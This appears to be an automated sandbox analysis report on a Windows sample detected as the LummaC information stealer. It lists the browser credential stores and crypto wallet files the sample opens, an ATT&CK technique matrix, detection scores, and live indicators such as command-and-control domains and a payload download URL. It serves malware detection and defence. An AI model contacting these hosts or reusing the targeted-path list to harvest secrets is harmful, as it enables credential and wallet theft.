Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z3IxCpcpg4.exe PID: 4296, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: z3IxCpcpg4.exe PID: 4296, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	45 Virtualization/Sandbox Evasion	LSASS Memory	861 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	45 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	11 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
z3IxCpcpg4.exe	66%	Virustotal		Browse
z3IxCpcpg4.exe	63%	ReversingLabs	Win32.Infostealer.Tinba
z3IxCpcpg4.exe	100%	Avira	TR/Crypt.TPM.Gen
z3IxCpcpg4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://community.fastly.steamstatic.co	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exens	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apim	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	104.21.66.86	true	false	high
www.google.com	142.250.181.68	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	false	high
curverpluch.lat	unknown	unknown	false	high
tentabatte.lat	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high
manyrestro.lat	unknown	unknown	false	high
bashfulacid.lat	unknown	unknown	false	high
shapestickyr.lat	unknown	unknown	false	high
observerfry.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
slipperyloo.lat	false	high
observerfry.lat	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
https://lev-tolstoi.com/api	false	high
curverpluch.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://store.steampowered.com/subscriber_agreement/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Youssef1313	chromecache_121.6.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://aka.ms/msignite_docs_banner	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9	chromecache_118.6.dr	false		high
http://polymer.github.io/AUTHORS.txt	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_121.6.dr	false		high
http://www.valvesoftware.com/legal.htm	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_121.6.dr	false		high
https://aka.ms/pshelpmechoose	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://aka.ms/feedback/report?space=61	chromecache_121.6.dr, chromecache_119.6.dr	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exer	z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://learn-video.azurefd.net/vod/player	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/intent/tweet?original_referer=$	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://github.com/Thraka	chromecache_121.6.dr	false		high
http://store.steampowered.com/privacy_agreement/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://store.steampowered.com/points/shop/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	z3IxCpcpg4.exe, 00000000.00000003.2260971149.000000000519A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	chromecache_121.6.dr	false		high
https://schema.org	chromecache_118.6.dr	false		high
http://polymer.github.io/LICENSE.txt	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exens	z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/adegeo	chromecache_121.6.dr	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/js-cookie/js-cookie	chromecache_99.6.dr, chromecache_118.6.dr	false		high
http://185.215.113.16/off/def.exe	z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schema.org/Organization	chromecache_121.6.dr	false		high
https://github.com/dotnet/try	chromecache_99.6.dr, chromecache_118.6.dr	false		high
https://store.steampowered.com/;	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_121.6.dr	false		high
https://steamcommunity.com/my/wishlist/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
